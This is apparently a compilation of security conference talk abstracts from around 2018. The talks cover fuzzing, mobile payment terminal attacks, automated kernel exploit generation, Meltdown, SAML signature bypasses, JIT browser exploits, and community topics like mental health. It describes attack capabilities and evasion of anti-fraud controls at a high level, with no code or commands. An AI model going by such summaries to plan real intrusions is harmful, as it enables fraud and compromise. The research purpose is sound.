Using clever input inference methods and containerization, we automate the fuzzing pipeline from start to end in a scalable fashion. We support acquiring binaries from a variety of sources, including blackbox binaries and source code repositories.
In cases for which FExM cannot automatically achieve a high coverage, it drops users to a novel AFL mode, "Afl-TimeWarp", in which they can set up testcases without the need to alter or understand the underlying code. AFL-TimeWarp mode allows to fuzz deeper program states without writing a single line of code, fitting FExM's philosophy to keep it simple for users.
To test the viability of our framework, we fuzzed over one hundred packages from the Arch Linux package repository with essentially zero effort. After only a few days, we already found 11 crashes, six of which were exploitable. This shows how FExM permits automated distributed fuzzing of applications; crash exploitability classification; and is equipped with a web front end for navigating security issues in a convenient way. Our work automatically retrofits fuzzing into the security development lifecycle.
These days it's hard to find a business that doesn't accept faster payments. Mobile Point of Sales (mPOS) terminals have propelled this growth lowering the barriers for small and micro-sized businesses to accept non-cash payments. Older payment technologies like mag-stripe still account for the largest majority of all in-person transactions. This is complicated further by the introduction of new payment standards such as NFC. As with each new iteration in payment technology, inevitably weaknesses are introduced into this increasingly complex payment eco-system.
In this talk, we ask what are the security and fraud implications of removing the economic barriers to accepting card payments; and what are the risks associated with continued reliance on old card standards like mag-stripe? In the past, testing for payment attack vectors has been limited to the scope of individual projects and to those that have permanent access to POS and payment infrastructure. Not anymore!
In what we believe to be the most comprehensive research conducted in this area, we consider four of the major mPOS providers spread across the US and Europe; Square, SumUp, iZettle, and Paypal. We provide live demonstrations of new vulnerabilities that allow you to MitM transactions, send arbitrary code via Bluetooth and mobile application, modify payment values for mag-stripe transactions, and a vulnerability in firmware; DoS to RCE. Using this sampled geographic approach, we are able to show the current attack surface of mPOS and, to predict how this will evolve over the coming years.
For audience members that are interested in integrating testing practices into their organization or research practices, we will show you how to use mPOS to identify weaknesses in payment technologies, and how to remain undetected in spite of anti-fraud and security mechanisms.
Online bots and real-world robots are both capable of manipulating people and communities. Online bots are part of attacks on human belief systems that range in scale from nation-states to smaller communities, aimed at disrupting, causing division and forcing group opinion. Current bot developers have shown good results with relatively unsophisticated programs, but algorithms exist to make these bots much more effective. Embodying these online bots into physical hardware bodies changes both the social dynamics and legal implications regarding their action.; Embodied bots, (ie. robots), can be used to socially engineer people by gaining their trust, and manipulating them into doing or saying something they otherwise might not. Increasingly sophisticated, free-roaming bots and robots also bring questions of responsibility, personhood, privacy rights and liability: we need to develop legal and policy frameworks to address AI, robots, and their interplay with our society now.
We discuss the mechanisms by which bots and robots manipulate people, the mitigations available, and the legal implications of such behaviours. We cover how to manipulate people online at scale, who's doing it (and why), why it works and how to defend yourself. We talk about the interplay between large-scale data collection and embodied robot manipulation of humans, how emotions are used, and how data collected by robots can be even more privacy invading because people form social bonds and attachments with robots. We also cover robot policy and law, and expected issues as bots become more sophisticated and ubiquitous. We finish with recommendations for attendees wanting to counter potential attacks.
Writing a working exploit for a vulnerability is generally challenging, time-consuming, and labor-intensive. To address this issue, automated exploit generation techniques can be adopted. In practice, existing techniques however exhibit an insufficient ability to craft exploits, particularly for the kernel vulnerabilities. On the one hand, this is because their technical approaches explore exploitability only in the context of a crashing process whereas generating an exploit for a kernel vulnerability typically needs to vary the context of a kernel panic. On the other hand, this is due to the fact that the program analysis techniques used for exploit generation are suitable only for simple programs but not the OS kernel which has higher complexity and scalability.
In this talk, we will introduce and release a new exploitation framework to fully automate the exploitation of kernel vulnerabilities. Technically speaking, our framework utilizes a kernel fuzzing technique to diversify the contexts of a kernel panic and then leverages symbolic execution to explore exploitability under different contexts. We demonstrate that this new exploitation framework facilitates exploit crafting from many aspects.
First, it augments a security analyst with the ability to automate the identification of system calls that he needs to take advantages for vulnerability exploitation. Second, it provides security analysts with the ability to achieve security mitigation bypassing. Third, it allows security analysts to automatically generate exploits with different exploitation objectives (e.g., privilege escalation or data leakage). Last but not least, it equips security analysts with an ability to generate exploits even for those kernel vulnerabilities for which the exploitability has not yet been confirmed or verified.
Along with this talk, we will also release many unpublished working exploits against several kernel vulnerabilities. It should be noted that, the vulnerabilities we experimented cover primarily Use-After-Free and heap overflow. Among all these test cases, more than 50% of them do not have working exploits publicly available. To illustrate this release, I have already disclosed one working exploit at my personal website (http://ww9210.cn/). The exploit released on my site pertains to CVE-2017-15649 for which there has not yet been an exploit publicly available with the demonstration of bypassing SMAP.
Organizations have been forced to adapt to the new reality: Anyone can be targeted and many can be compromised.
This has been the catalyst for many to tighten up operations and revamp ancient security practices. They bought boxes that blink and software that floods the SOC with alerts. Is it enough?
The overwhelming answer is: No.
The security controls that matter most are the ones that best protect those with the keys to the enterprise, the Active Directory administrators. With this access, an attacker can do anything they want in the environment: access all sensitive data, change access controls and security settings, embed to persist (for years), and often fully manage and control routers, switches, the virtualization platform (VMWare or Microsoft Hyper-V), and increasingly, the cloud platform.
Administrators are being dragged into a new paradigm where they have to more securely administer the environment. This involves protecting privileged credentials and limiting access. Again the question is: Are the new ways to securely administer Active Directory enough to protect against attackers? Join me in this session to find out.
Some of the areas explored in this talk:
* Explore how common methods of administration fail.
* Demonstrating how attackers can exploit flaws in typical Active Directory administration.
* Highlight common mistakes organizations make when administering Active Directory.
* Discuss what's required to protect admins from modern attacks.
* Provide the best methods to ensure secure administration and how to get executive, operations, and security team acceptance.
Complexity is increasing. Trust eroding. In the wake of Spectre and Meltdown, when it seems that things cannot get any darker for processor security, the last light goes out. This talk will demonstrate what everyone has long feared but never proven: there are hardware backdoors in some x86 processors, and they're buried deeper than we ever imagined possible. While this research specifically examines a third-party processor, we use this as a stepping stone to explore the feasibility of more widespread hardware backdoors.
Virtualization technology is fast becoming the backbone of the security strategy for modern computing platforms. Hyper-V, Microsoft's virtualization stack, is no exception and is therefore held to a high security standard, as is demonstrated by its $250,000 public bug bounty program.
As one might expect, Microsoft's own engineers are continually looking for vulnerabilities in the code that makes up their products. Perhaps more unexpectedly, Microsoft also develops exploits for these products in an effort to gain a better understanding of the techniques involved and mitigate them before they can be used against customers. In this talk, we will relate how Microsoft's Offensive Security Research (OSR) team did just that with Hyper-V by discovering CVE-2017-0075, developing relevant and novel exploitation techniques to exploit it, and finally contributing learnings to Hyper-V hardening efforts. The presentation will detail every step of this process in great detail, culminating in a live Hyper-Pwning demonstration.
Substance abuse is present in and affects all communities, even information security. This session will detail the relationship between stress, addiction, and relapse. Additionally, the speaker will discuss her experience with alcohol use disorder while maintaining a career in information security and share advice on how people and companies can be inclusive and supportive for those living a clean and/or sober life. Attendees will gain perspective and a greater understanding of their peers and employees in recovery.
When incidents of sexual harassment or sexual assault occur within communities, as we've recently seen in InfoSec, how can a community respond in ways that support survivors and also hold problematic members accountable? How does a community move forward together stronger after these incidents? How do I support a friend who has been assaulted or harassed? How do I respond when a friend is accused?
This session outlines how someone with Autism Spectrum Disorder (ASD) offers a unique skillset that can be very helpful in the cybersecurity field.
A higher percentage of hackers show signs or are already diagnosed ASD than compared to most civilians who are not hackers and/or do not work in the security industry.
Many organizations see hiring a young person with any type of mental illness as a gamble, including someone with ASD. In this talk, we are going to give three different perspectives on the positive and challenging elements of hiring, managing, and enabling an ASD employee to thrive, applying their particular characteristics to the tasks associated with cybersecurity.
Hear from a hiring manager, a security professional that has been on the positive side of the spectrum for years, and a psychologist that has researched Autism Spectrum Disorder (ASD) and the specific behaviors that can be helpful for the corporate and/or intelligence sector.
Despite its simplicity, the "software bill of materials" (SBOM) has been met with apathy and hostility, especially in policy circles. Why has this common industrial concept been so unpopular when translated into the information security context, and how can it potentially revolutionize our industry? This talk will shed light onto the policy context of this discussion, and lay out a vision of how members of the security community can win over the naysayers to foster greater transparency.
The US Department of Commerce recently announced a new 'multistakeholder initiative' on software bill of materials. The goal is for software and IoT vendors to share details on the underlying components, libraries, and dependencies with enterprise customers. This transparency can catalyze a more efficient market for security by allowing vendors to signal quality and giving enterprise customers key knowledge—you can't defend what you don't know about.
This transparency creates a new paradigm of shared security responsibilities, where an enterprise customer can have greater insight into what is running on their network. This, in turn, complicates existing relationships between vendor and customer. With this transparency, how can vendors offer assurances that a discovered vulnerability doesn't affect a particular product? How can vendors safeguard trade secrets with an incomplete SBOM, along the lines of "natural and artificial flavorings" on an ingredient list? And lastly, how will this inform the emerging debate over end-of-life in the IoT space, particularly for medical devices and automobiles that have a physical life space beyond their software support model? None of these hurdles are insurmountable, but solutions will require finding common ground. A world where SBOMs are more common can be a more secure world, but we'll need to tackle the newly raised policy issues as well.
Despite high-profile failures, there can be no doubt that embedded security is improving. Yet, several dark clouds loom on the horizon – including side channel attacks and fault attacks. For many, they remain vague and undefined, with complicated analysis required to understand if they are even applicable to a target of interest, yet alone how to perform the attack.
This talk introduces a new open-source tool, called ChipWhisperer-Lint, that will solve at least one of these problems. It can be used with the open-source ChipWhisperer hardware to completely automate finding power analysis attacks in arbitrary devices. The initial tool supports the AES algorithm, and five microcontrollers with AES hardware acceleration (which have not been previously broken) will be demonstrated to be vulnerable to side-channel power analysis. These attacks mean products relying on their encryption to protect critical secrets could be easily compromised (such as happened with the Philips Hue attack).
This tool extends Colin's previous work in making power analysis attacks accessible to every engineer with open-source hardware and software. This latest tool is a leap forward in accessibility and laziness, by removing even needing to truly understand how the attacks works. Now truly there can be no excuse for using insecure devices in your products, as finding specific side-channel power analysis vulnerabilities can be performed in a few minutes across a wide range of embedded devices.
SAML is often the trust anchor for Single Sign-On (SSO) in most modern day organizations. This presentation will discuss a new vulnerability discovered which has affected multiple independent SAML implementations, and more generally, can affect any systems reliant on the security of XML signatures. The issues found through this research affected multiple libraries, which in turn may underpin many SSO systems.
The root cause of this issue is due to the way various SAML implementations traverse the XML DOM after validating signatures. These vulnerabilities allow an attacker to tamper with signed XML documents, modifying attributes such as an authenticating user, without invalidating the signatures over these attributes. In many cases, this allows an attacker with authenticated access to a SAML Identity Provider to access services as an entirely different user - and more easily than you'd expect.
This talk will also discuss another demonstrated class of vulnerabilities in user directories that amplify the impact of the previously mentioned vulnerability, and in some cases, can enable authentication bypasses on their own.
The majority of systematic approaches to information security are created by contributors from stable nation states, where the design assumes that the originator is wholesome and true, the playing field is lush and green and the children frolic care-free making daisy-chain bracelets. This talk discusses the realities of corruption, with real-life anecdotes from interviews conducted with real criminals and victims. This talk also explains the challenges and differences between trying to 'do' information security in developed and developing countries, where often corruption can derail security efforts and the people put in place to run the show are working against you. I also discuss typical challenges of working in difficult climates, how this can impact us (as security warriors), with first-hand accounts from those involved and some of the things we can do to combat corruption.
A basic understanding of threat modelling and a slightly dark sense of humour are advantageous in getting the most out of this talk.
Computer malware in all its forms is nearly as old as the first PCs running commodity OSes, dating back at least 30 years. However, the number and the variety of "computing devices" dramatically increased during the last several years. Therefore, the focus of malware authors and operators slowly but steadily started shifting or expanding towards Internet of Things (IoT) malware.
Unfortunately, at present there is no publicly available comprehensive study and methodology that collects, analyses, measures, and presents the (meta-)data related to IoT malware in a systematic and a holistic manner. In most cases, if not all, the resources on the topic are available as blog posts, sparse technical reports, or Systematization of Knowledge (SoK) papers deeply focused on a particular IoT malware strain (e.g., Mirai). Some other times those resources are already unavailable, or can become unavailable or restricted at any time. Moreover, many of such resources contain errors (e.g., wrong CVEs), omissions (e.g., hashes), limited perspectives (e.g., network behaviour only), or otherwise present incomplete or inaccurate analysis. Hence, all these factors leave unattended the main challenges of analysing, tracking, detecting, and defending against IoT malware in a systematic, effective and efficient way.
This work attempts to bridge this gap. We start with mostly manual collection, archival, meta-information extraction and cross-validation of more than 637 unique resources related to IoT malware families. These resources relate to 60 1 IoT malware families, and include 260 resources related to 48 unique vulnerabilities used in the disclosed or detected IoT malware attacks. We then use the extracted information to establish as accurately as possible the timeline of events related to each IoT malware family and relevant vulnerabilities, and to outline important insights and statistics. For example, our analysis shows that the mean and median CVSS scores of all analyzed vulnerabilities employed by the IoT malware families are quite modest yet: 6.9 and 7.1 for CVSSv2, and 7.5 and 7.5 for CVSSv3 respectively. Moreover, the public knowledge to defend against or prevent those vulnerabilities could have been used, on average, at least 90 days before the first malware samples were submitted for analysis. Finally, to help validate our work as well as to motivate its continuous growth and improvement by the research community, we open-source our datasets and release our IoT malware analysis framework and our IoT malware analysis framework.
Claims abound that the Mafia is not only getting involved in cybercrime, but taking a leading role in the enterprise. One can find such arguments regularly in media articles, on blogs, and in discussions with members of the information security industry. In some sense it has become a mainstream position. But, what evidence actually exists to support such claims?
Drawing on a seven year University of Oxford study into the organisation of cybercrime, this talk evaluates whether the Mafia is in fact taking over cybercrime, or whether the structure of the cybercriminal underground is something new. It brings serious empirical rigor to a question where such evidence is often lacking. This analysis is based on almost 250 interviews with law enforcement, the private sector and former cybercriminals. These were carried out in some 20 countries, including fieldwork in purported cybercrime "hotspots" like Russia, Ukraine, Romania, Nigeria, Brazil, and China.
This talk broadly addresses the range of connections between Mafias, organised crime, and cybercrime. But, it focuses this discussion on the so-called "Russian Mafia" as this is the specific boogieman that many claims mention and some of the most sophisticated cybercrime actors are based in the former Soviet Bloc. As part of this discussion, a more informed understanding will be developed around: what a Mafia is, the evolution of the Russian Mafia, and known cases where organised criminals have been directly involved in cybercrime.
In determining whether cybercrime is best conceptualised and tackled through an organised crime prism or not, this talk should be of relevance to a range of members of the cybersecurity community, including policymakers, law enforcement and the private sector. It is an exclusive presentation of book material to be published in the Fall by Harvard University Press.
Recent years have seen the emergence of PHP unserialization vulnerabilities as a viable route to remote code execution or other malicious outcomes. The presentation will start with a brief refresher on the issue as it has previously been understood before introducing new research which shows how unserialization can be induced when other types of vulnerability occur, including some that would previously have been considered low impact.
The presentation will include demos of long lived and previously unidentified RCE exploits against some of the most widely deployed open source PHP web applications and libraries.
Modern operating systems nowadays implement read-only memory mappings at their CPU architecture level, preventing common security attacks. By mapping memories as read-only, the memory owner process can usually trust the memory content, eleminating unnecessary security considerations such as boundary check, TOCTTOU(Time of check to time of use) issues etc., with the assumption of other processes not being able to mutate read-only shared mappings in their own virtual spaces.
However, the assumption is not always correct. In the past few years, several logical issues were addressed by security community, most of which were caused by operating systems incorrectly allowing to remap the read-only memories as writble without marking them COW(copy-on-write). As a result, the memory content of the owner process is not trustable anymore, yet causing memory corruption problem or even leading to userland privilege escalation. With operating system evolves, such issues are rare though. On the other hand, with stronger and more abundant features provided by peripheral components attached to the mobile device, DMA(direct-memory-access) technology enables the ability for fast data transfer between the host and peripheral devices. DMA leverages IOMMU(Input/Output Memory Management Unit) for memory operations, thus memory protection mechanism provided by CPU MMU is not available during the DMA transfer. In the middle of 2017, Gal Beniamini of Goole Project Zero team utilized DMA to successfully achieve device-to-host attack on both Nexus 6p and iPhone 7. Nevertheless, this new attack model usually only applies for device-to-host attack senario, where a firmware bug is needed to fully control the device. Unfortunately, DMA related interfaces are not exposed to userland applications directly.
With months of research, we found an exception case on iOS device: the Apple Graphics. At MOSEC conference in 2017, we demonstrated jailbreak for iOS 10.3.2 and iOS 11 beta 2, the latest version at that time, on iPhone 6s and iPhone 7. Details of the demonstration have never been published yet.
In this talk, we will introduce the concepts essential to our bugs, which includes:
- Indirect DMA features exposed to iOS userland
- The implementation of IOMMU memory protection
- Notification mechanism between GPU and Apple Graphics driver
The next part will cover two bug details: one in DMA handling with host virtual memory, and another out-of-bound write issue caused by potentially untrusted userland read-only memory.
Lastly we talk about how we combine two flaws across different Apple Graphics components to achieve reliable kernel code execution from iOS application sandbox.
Recent advancements in OS security from Microsoft such as PatchGuard, Driver Signature Enforcement, and SecureBoot have helped curtail once-widespread commodity kernel mode malware such as TDL4 and ZeroAccess. However, advanced attackers have found ways of evading these protections and continue to leverage kernel mode malware to stay one step ahead of the defenders. We will examine the techniques from malware such as DoublePulsar, SlingShot, and Turla that help attackers evade endpoint defenses. We will also reveal a novel method to execute a fully kernel mode implant without hitting disk or being detected by security products. The method builds on publicly available tools which makes it easily within grasp of novice adversaries.
While attacker techniques have evolved to evade endpoint protections, the current state of the art in kernel malware detection has also advanced to hinder these new kernel mode threats. We will discuss these new defensive techniques to counter kernel mode threats, including real-time detection techniques that leverage hypervisors along with an innovative hardware assisted approach that utilizes performance monitoring units. In addition, we will discuss on-demand techniques that leverage page table entry remapping to hunt for kernel malware at scale. To give defenders a leg up, we will release a tool that is effective at thwarting advanced kernel mode threats. Kernel mode threats will only continue to grow in prominence and impact. This talk will provide both the latest attacker techniques in this area, and a new tool to curtail these attacks, proving real-world strategies for immediate implementation.
In 2014, we took to the stage and presented "A Wake-up Call for SATCOM Security," during which we described several theoretical scenarios that could result from the disturbingly weak security posture of multiple SATCOM products. Four years later, we are back at Black Hat to prove those scenarios are real.
Some of the largest airlines in the US and Europe had their entire fleets accessible from the Internet, exposing hundreds of in-flight aircraft. Sensitive NATO military bases in conflict zones were discovered through vulnerable SATCOM infrastructure. Vessels around the world are at risk as attackers can use their own SATCOM antennas to expose the crew to RF radiation.
This time, in addition to describing the vulnerabilities, we will go one step further and demonstrate how to turn compromised SATCOM devices into RF weapons. This talk will cover new areas on the topic, such as reverse engineering, Radio Frequency (RF), SATCOM, embedded security, and transportation safety and security.
The Internet was a much different place 25 years ago. Technology, and the free flow of information has rapidly changed the world forever. Along with that change came the frightening prospect of losing all of our privacy, attacks on our critical infrastructure, election tampering, invasive ad targeting, and the general paranoia that comes with knowing that no technology is safe. The law, regulatory bodies, and government policy has struggled to keep up with this change, but times are changing. In recent years, we have seen the legal community at the front of some of the most important battles regarding information security. The legal communities impact on information security is growing every year. This panel brings together some of those insightful and forward thinking minds to discuss some of the emerging legal trends in security that will impact all of us tomorrow.
There has been much discussion of "software liability," and whether new laws are needed to encourage or require safer software. My presentation will discuss how -- regardless of whether new laws are passed -- a tidal wave of litigation over defective IoT cybersecurity is just over the horizon.
The presentation will focus on a well-known example: Charlie Miller and Chris Valasek's 2015 Jeep hack. I'm lead counsel in the ongoing federal litigation over the cybersecurity defects Charlie and Chris exposed, and that are shared by 1.4 million Chrysler vehicles. As far as I know, our case is one of the first, and the biggest, that involves claims that consumers should be compensated for inadequate cybersecurity in IoT products.
This case is the tip of the iceberg. IOT products are ubiquitous, and in general their cybersecurity is feeble, at best. In the event of a cyberphysical IoT hack that causes injury, there are established legal doctrines that can be used to impose liability every company involved in the design, manufacturing, and distribution of an exploited IoT device or even its cyber-related components. Such liability could be crippling, if not fatal, for organizations that don't know how to properly handle and prepare for potential lawsuits.
Taking steps to minimize legal exposure before an accident happens or a lawsuit is filed—in the design, manufacture, product testing, and marketing phases of an IoT product—can be the difference between life and death for IoT companies. Knowing what steps to take and how to take them requires an understanding of the core legal principles that will be applied in determining whether a company is liable.
Back with another year of soul crushing statistics, the Black Hat NOC team will be sharing all of the data that keeps us equally puzzled, and entertained, year after year. We'll let you know all the tools and techniques we're using to set up, stabilize, and secure the network, and what changes we've made over the past year to try and keep doing things better. Of course, we'll be sharing some of the more humorous network activity and what it helps us learn about the way security professionals conduct themselves on an open WiFi network. Spoiler Alert: It's poorly. We conduct ourselves poorly.
The WinVote voting machine was used extensively in Virginia elections during 2004 and 2015. It has been dubbed the worst voting machine ever and that for good reasons. It runs Windows XP, service pack 0. It has by default Wifi enabled. It uses WEP security and all WinVote machines appear to use the same password "abcde". Age old exploits give adversaries administrator level privileges without physical access to the machine and to make matters worse, the remote desktop protocol is enabled by default on each and every machine. All of this is well-known and well-documented, however there are lessons to be learned that go beyond hacking, lessons that effect society as a whole.
The single most important concern of any electoral process is the trust of the voters: winners and losers alike must be convinced of the quality of the electoral process so that all are able to accept the outcome. This is a tall order, because, as we all know by now, national elections use election technologies in highly contested adversarial environments, where network, hardware, software, and configuration processes must be assumed to be under the adversary's control. The WinVote can be used as instrument by hackers to influence the election result.
Using the WinVote voting machine as an example, I will demonstrate in my talk what threat WinVote machines and machines like it pose to democracy. And I will outline ways to achieve credible levels of election security. The key is evidence production, either in form of paper ballots, cryptographic proofs, multiple result paths, or statistical evidence. The WinVote doesn't implement any of these, hence it is the perfect stealth tool for adversaries.
This prompts the question if election meddling took place in Virginia at any time while WinVote machines were in service? After these machines were officially decommissioned in 2015, a number of them were released into the wild. We managed to secure a few of them and forensically analyzes them using standard tools and by comparing the content of their respective drives. A few more machines are on their way. The evidence left on each machine were two SSD drives, one small (32MB) and one large (384MB or 512MB).
At the time of writing this report no smoking gun indicating election meddling could be identified. However, we could clearly establish that some WinVote voting machines were used for purposes other than voting: One Voting machine was used to rip songs from CDs and broadcast MP3s, most notably, perhaps, a Chinese song from 1995: 白雪-千古绝唱.mp3.
Trust in elections cannot be achieved through technology alone - it can only be achieved by the means of producing evidence and checking it for consistency. After Black Hat 2018, the United States has only approximately 90 days left to get ready for the 2018 midterm elections. By the time of writing this talk proposal, several States still use voting machines similar to the WinVote that do not produce any form of evidence.
Deep learning can help automate the signal analysis process in power side channel analysis. So far, power side channel analysis relies on the combination of cryptanalytic science, and the art of signal processing. Deep learning is essentially a classification algorithm, but instead of training it on cats, we train it to recognize different leakages in a chip. Even more so, we do this such that typical signal processing problems such as noise reduction and re-alignment are automatically solved by the deep learning network. We show we can break a lightly protected AES, an AES implementation with masking countermeasures and a protected ECC implementation and show a live demo of the attack in action. These experiments show that where previously side channel analysis had a large dependency on the skills of the human, first steps are being developed that bring down the attacker skill required for such attacks. This talk is targeted at a technical audience that is interested in latest developments on the intersection of deep learning, side channel analysis and security.
The control and management of mobile networks is shifting from manual to automatic in order to boost performance and efficiency and reduce expenditures. Especially, base stations in today's 4G/LTE networks can automatically configure and operate themselves which is technically referred to as Self Organizing Networks (SON). Additionally, they can auto-tune themselves by learning from their surrounding base stations. This talk inspects the consequences of operating a rogue base station in an automated 4G/LTE network. We exploit the weaknesses we discovered in 4G/LTE mobile phones and SON protocols to inject malicious packets into the network. We demonstrate several attacks against the network and discuss mitigation from the mobile network operators perspective.
Speak with any Fortune 500 running mainframe and they'll tell you two things: (1) without their mainframes they'd be out of business (2) they do not conduct any security research on them, let alone vulnerability scans. The most infuriating part is that mainframes are simply computers, they're different from what you're used to, but that doesn't mean they can't be hacked. Previous talks about this topic have covered the platform from a high level, imploring you to do the basics. This talk continues this series of talks, given by others, around mainframe hacking. Previously covered topics included network penetration testing and privilege escalation. To complement those talks, this talk will expose attendees to the various tools that exist on the platform to help you do your own reverse engineering, followed by detailed steps on how to start your own exploit development. Attendees will learn what debuggers are available on the platform, such as dbx and ASMIDF, as well as the challenges you'll have using them. After learning how to RE, attendees will then learn how to develop their own exploits and buffer overflows on the platform using C, assembler and JCL. A demo program will be used to teach all these items so people can follow along. Topics included in this discussion are APF authorization, bypassing RACF/ACEE, TSO, Unix System Services.
Security is a constant cat-and-mouse game between those trying to keep abreast of and detect novel malware, and the authors attempting to evade detection. The introduction of the statistical methods of machine learning into this arms race allows us to examine an interesting question: how fast is malware being updated in response to the pressure exerted by security practitioners? The ability of machine learning models to detect malware is now well known; we introduce a novel technique that uses trained models to measure "concept drift" in malware samples over time as old campaigns are retired, new campaigns are introduced, and existing campaigns are modified. Through the use of both simple distance-based metrics and Fisher Information measures, we look at the evolution of the threat landscape over time, with some surprising findings. In parallel with this talk, we will also release the PyTorch-based tools we have developed to address this question, allowing attendees to investigate concept drift within their own data.
The security of computer systems fundamentally relies on the principle of confidentiality. Confidentiality is typically provided through memory isolation, e.g., kernel address ranges are marked as non-accessible and are protected from user access.
In this talk, we present Meltdown. Meltdown breaks the most fundamental isolation between user applications and the operating system. We show how any program can access system memory, including secrets of other programs and the operating system. To make the attack accessible, we briefly introduce basics on microarchitectural side effects and out-of-order execution on modern processors.
With a behind-the-scenes timeline of our research, we show when and how the combination of these components allowed us to read arbitrary kernel-memory locations including personal data and passwords. We will also discuss how different vendors, i.e., Intel, AMD, and ARM, are affected by the issue and how they responded to these issues.
In a live demo, we show a series of Meltdown attacks, including attacks on a modern smartphone with an ARM processor. Our demo does not only show how to read privileged data or sensitive user input, but also shows novel exploits leveraging Meltdown. We then show how Meltdown is mitigated in software, using our KAISER defense mechanism, which was implemented under different names in all major operating systems.
The last part of our talk will focus on the developments after the disclosure of Meltdown. We will discuss the situation around the patches, Meltdown variants that were presented after the disclosure (e.g. MeltdownPrime), yet undisclosed attacks, including combinations of Meltdown and Spectre and their application in JavaScript, and further proposed mitigations.
We conclude with high level perspectives we as a community and industry should draw to be prepared for the next Meltdown.
It's not easy to miss the gunshot wound in the trauma bay, or the cough of a rip-roaring pneumonia. But as anyone who has struggled with mental illness can attest- psychic wounds run just as deep, yet are often shunned or ignored by family, friends, coworkers, and even healthcare professionals. This needs to change.
Mental illness affects one in five Americans, and suicide is the second leading cause of death for people in their early twenties. Chances are if you haven't struggled with depression yourself you know someone who has, and the hacker community is not immune to the pressures of high stress jobs, abnormal sleep schedules, social depersonalization, and many of the other risk factors predisposing to substance use disorders or suicide.
Join Christian Dameff, a hacker moonlighting on the front lines of healthcare as an emergency medicine physician, and Jay Radcliffe, world-renowned security researcher who has struggled with and depression, ADHD and a variety of other mental health conditions, as they work to shatter the stigma and silence surrounding this monumental crisis affecting the hacker community - and society- at large. Combining the latest in evidence based medicine and pharmacology with powerful anecdotes of personal experience combatting depression, this talk will educate, challenge, and invigorate you with a hope-filled and simple message- you are not alone, and you are surrounded by friends who want to help.
Miasm is a reverse engineering framework created in 2006 and first published in 2011 (GPL). Since then, it has been continuously improved through a daily use. The framework is made of several parts, including an assembler/disassembler for several architectures (x86, aarch64, arm, etc.), an human readable intermediate language describing their instructions' semantic, or sandboxing capabilities of Windows/Linux environment. On top of these foundations, higher level analysis are provided to address more complex tasks, such as variable backtracking and dynamic symbolic execution.
In this talk, we will introduce some of these features. The journey will start with the basics of the framework, go through symbolic emulation and function divination (Sibyl), and end with various components useful for malware analysis.
We will also talk about some of the new features which will be released for Black Hat. For example, the freshly implemented SSA transformation will be illustrated by applications in code simplification. Then, we will demonstrate how this feature, jointly with new operators description, enables more accurate code analyses. Finally, we will highlight what a better environment simulations and a wider support of recent instructions provides.
Miasm being a practical tool, each topic will be covered with real life use-cases.
Right now, combatting credit card fraud is mostly a reactionary process. Issuers wait until transactions occur that either appear fraudulent according to rules-based analytic engines or are reported by customers, and only then, do they intervene to prevent further fraud. But by then, it's often too late - losses through merchandise theft, investigation cost, reissuance, etc., have already occurred, and those losses have piled up into over $10B of stolen funds each year being pumped into the online criminal ecosystem.
There is a better way. By using intelligence gathered from online sources such as the dark web combined with transactional data, we demonstrate predictive analytics that can not only identify who the next fraud victims will be, but also where card data is being stolen from, all before any fraudulent transactions have occurred.
Payment card fraud is the slush fund that underlies most global criminal threats, from organized crime to political meddling, in large part because of antiquated, reactive techniques and a dearth of innovative techniques to more proactively combat it. Our approach represents a paradigm shift in fighting payment card fraud; by using dark web market intelligence combined with transaction data to predict both fraudulent charges and points of compromise, we can intervene before any loss occurs, stopping payment card fraud dead in its tracks and eliminating a major source of funding for the global criminal ecosystem.
After the last round of the UN sponsored consultations on international cybersecurity collapsed in 2016, the international situation in cyber diplomacy has been in flux: will there be other UN rounds of discussion? Will private sector-organized initiatives claim a role? And what norms and rules of behavior in cyberspace for state and (and non-state actors) will be agreed? The Global Commission on the Stability of Cyberspace has been working on these issues, and at Black Hat some of its members will discuss the new norms (e.g. safeguarding the critical infrastructure of the Internet, protecting electoral systems from attack, etc.) as well as provide insight into some of the current thinking of the Commission, as well as government, international organizations, and major corporations working on the subject worldwide.
As finding reliably exploitable vulnerabilities in web browser engines becomes gradually harder, attackers turn to previously less explored areas of the code. One of these seems especially interesting: just-in-time (JIT) compilers built into the JavaScript engines to maximize their performance by turning JavaScript code into optimized machine code at runtime. With commonly multiple tiers of JIT compilers (speak multiple different compilers) and an excessive focus on performance at the cost of added complexity, they are an attractive target for security researchers. Furthermore, the bugs found in them often turn out to be easily and reliably exploitable. Last but not least, JIT compilers appear to be "future proof" targets as their prevalence (and complexity) will likely continue to grow in the future.
This talk will explore the inner workings of JIT compilers for the JavaScript language with a focus on security relevant aspects. First, the challenges faced by such compilers as well as the common solutions implemented by the most prominent engines will be described. Afterwards, the attack surface of client-side JIT compilers will be explored together with a discussion of the rather unique vulnerabilities frequently found in them. Finally, a specific, but fairly typical JIT compiler vulnerability will be presented, along with the process of its discovery. This vulnerability was used in Pwn2Own 2018 to successfully exploit Safari on macOS. A brief walkthrough of its exploitation, yielding a near 100% reliable exploit that completes within a few milliseconds, will conclude this talk.
Live video streaming services are getting more and more popular in China. In order to ensure their own interests, various service providers have added visible watermarks, which have become increasingly fierce and vicious. Users (originators and viewers) are fed up with those ugly watermarks which are taking up more and more of the screen.
We have found that some of the service providers' watermarks can be actively eliminated, that is, originators can place a reverse watermark in their own video stream beforehand to cancel the service provider's watermark. Although the idea is intuitive, there are some problems in implementation, such as size, position, and shadow. After we theoretically provided an estimation of the achievable limits with computer graphics theory, we did a PoC against one of the largest video streaming service providers in China, which is also listed on the NYSE. The results were very good. After solving some problems related to the parameters related to color management and color space conversion, we can achieve nearly 100% active cancellation of watermarks.
To automate this process, we also build a ffmpeg filter as well as an OBS plugin, which can be helpful to do real-time adjusting with very short training sequence of frames during live broadcasting, so as to achieve a better watermark cancellation effect.
In addition, we propose several existential risks for watermarks that cannot be actively canceled: a) Transform Attack: to transform one watermark into another provider's. b) Code Rate Jitter Attack: adding high-frequency components to force video codec to reduce the code rate near watermark. c) Frame Squeezing Attack: sacrificing some resolution by squeezing screen, then restoring with user-defined javascript to bypass watermark. Corresponding examples and security countermeasures are also provided.
Many new devices are trying to fit into our life seamlessly. As a result, there's a quest for a "universal access methods" for all devices. Voice activation seems to be a natural candidate for the task and many implementations for it surfaced in recent years. A few notable examples are Amazon's Alexa, Google's Assistant and Microsoft's Cortana.
The problem starts when these "Universal" access methods, aimed for maximal comfort, meet the very "specific" use-case of the enterprise environment which requires comfort to be balanced with other aspects, such as security. Microsoft Cortana is used on Mobile and IoT devices, but also in the enterprise computers as it comes enabled by default with Windows10 and always ready to respond to users' commands even when the machine is locked.
